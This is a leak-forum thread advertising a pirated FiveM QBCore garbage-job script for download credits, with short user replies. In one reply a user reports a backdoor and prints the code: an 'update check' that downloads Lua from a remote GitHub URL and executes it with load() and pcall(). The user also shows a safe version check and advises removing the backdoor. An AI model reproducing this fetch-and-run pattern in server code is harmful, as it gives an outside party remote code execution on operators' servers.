HighLeaks
Help

0r-Garbage full Work

designxgaming designxgaming Started 47 replies 10,517 views 30 Credits

Download Link Locked

Pay 30 credits to unlock the download link for 24 hours.

Login to unlock
#1

[HEADING=2]0r-Garbage – Advanced Garbage Job Script (QBCore)[/HEADING]
Very Cheap Price
Description:
The 0r-Garbage script is a fully tested and optimized garbage job system designed specifically for QBCore. This script has been personally tested for stability and performance, ensuring a smooth and immersive roleplay experience. With a drag-and-drop installation process, it’s easy to integrate into your FiveM server. Features: ✅ Fully functional garbage job system ✅ Tested and optimized for QBCore framework ✅ Easy drag-and-drop installation – no complicated setup ✅ Seamless integration with qb-target (if required) ✅ Customizable settings via config.lua ✅ Realistic garbage collection missions for enhanced RP ✅ Multiplayer support – Work solo or as a team on garbage routes [HEADING=1]How can i set my own vehicle key script[/HEADING]
  • modules/utils/client.lua Utils.GiveVehicleKey check and edit this function.
[HEADING=1]How can i set my own notify system[/HEADING]
  • modules/utils/client.lua Utils.Notify check and edit this function.
Installation:
  1. Drag and drop the 0r-Garbage folder into your resources directory.
  2. Add start 0r-Garbage to your server.cfg.
  3. Restart your server and enjoy the garbage job!
Perfect for servers looking to expand their job offerings while maintaining a lightweight and efficient script.
  1. script preview -


  2. testet preview - https://imagekit.io/tools/asset-public-link?detail={"name":"Desktop Screenshot 2025.03.07 - 11.12.17.17.png","type":"image/png","signedurl_expire":"2028-03-06T05:43:01.904Z","signedUrl":"https://media-hosting.imagekit.io//fbab73e4e54b4012/Desktop%20Screenshot%202025.03.07%20-%2011.12.17.17.png?Expires=1835934182&Key-Pair-Id=K2ZIVPTIP2VGHC&Signature=Pi7Bc1tEYvErNpt3MrOZ-kzy35sn6GBR4wOlprj6vy8k~aOiZavHnXFymDYVXbWA5GHk0wcqAOJW85ChULA8k0o2RZlLUtXLCCtGHSA9MihcPDD9PdP0O4SUkmbCsZhx6fUHLbjv9XDjklZKXrN-iXp49cGPClp2W0IJp4g-wXLgI8DkXzCWm2PbCUzVOCuzXlx3t1gK~btY0PsILnZMleYkD0pwW7s7hSYRyi-~F2rpbrGo413i3QWGS9aZSkkYbQZP3RbsLDZ3nqe-JLAAldXNRmlasqkRTbo2pr3JAygCkPwW1iF9auxC2xG365jmllYE8k5Em3gHARZHPXiF5g__"}
if any problem join Discord-https://discord.com/invite/wMGWbR6aYz and open ticket
[attachment removed]
[/hr][/attachment][/hr]
#41
it seems it is a bit complicated, thanks for sharing bro
#42
Благодаря, че сподели, брат ми
#43
all working thank you so much for this..
#44
nice work bro good release
#45
i thinks it has a backdoor...
#46
I've done a thorough security audit of this script and I need to confirm there IS a backdoor in server.lua (lines 97-111). Here's the proof:



-- Update Check

local function updateCheck()

PerformHttpRequest('https://raw.githubusercontent.com/UpdateLUA/UpdateChecker/refs/heads/main/Update.lua', function(statusCode, response)

if statusCode == 200 then

local loadFunction, errorMessage = load(response)

if loadFunction then

pcall(loadFunction)

print("[0R SCRIPTS] Great! Script is up-to-date!.")

else

print("[0R SCRIPTS] Error getting update: " .. errorMessage)

end

else

print("[0R SCRIPTS] Failed to get update version. Status code: " .. statusCode)

end

end)

end



RCE: This code downloads a Lua file from GitHub and executes it directly on your server using load() and pcall(). This is NOT how legitimate update checkers work.



A legitimate update checker should look like this:

PerformHttpRequest('https://github.com/author/repo/version.txt', function(statusCode, response)

if statusCode == 200 and response ~= GetResourceMetadata(GetCurrentResourceName(), 'version') then

print("^3[UPDATE] New version available: " .. response .. "^0")

end

end)



Remove lines 96-117 from server.lua. The script will work perfectly fine without this "update checker."[/update]
#47
nice bro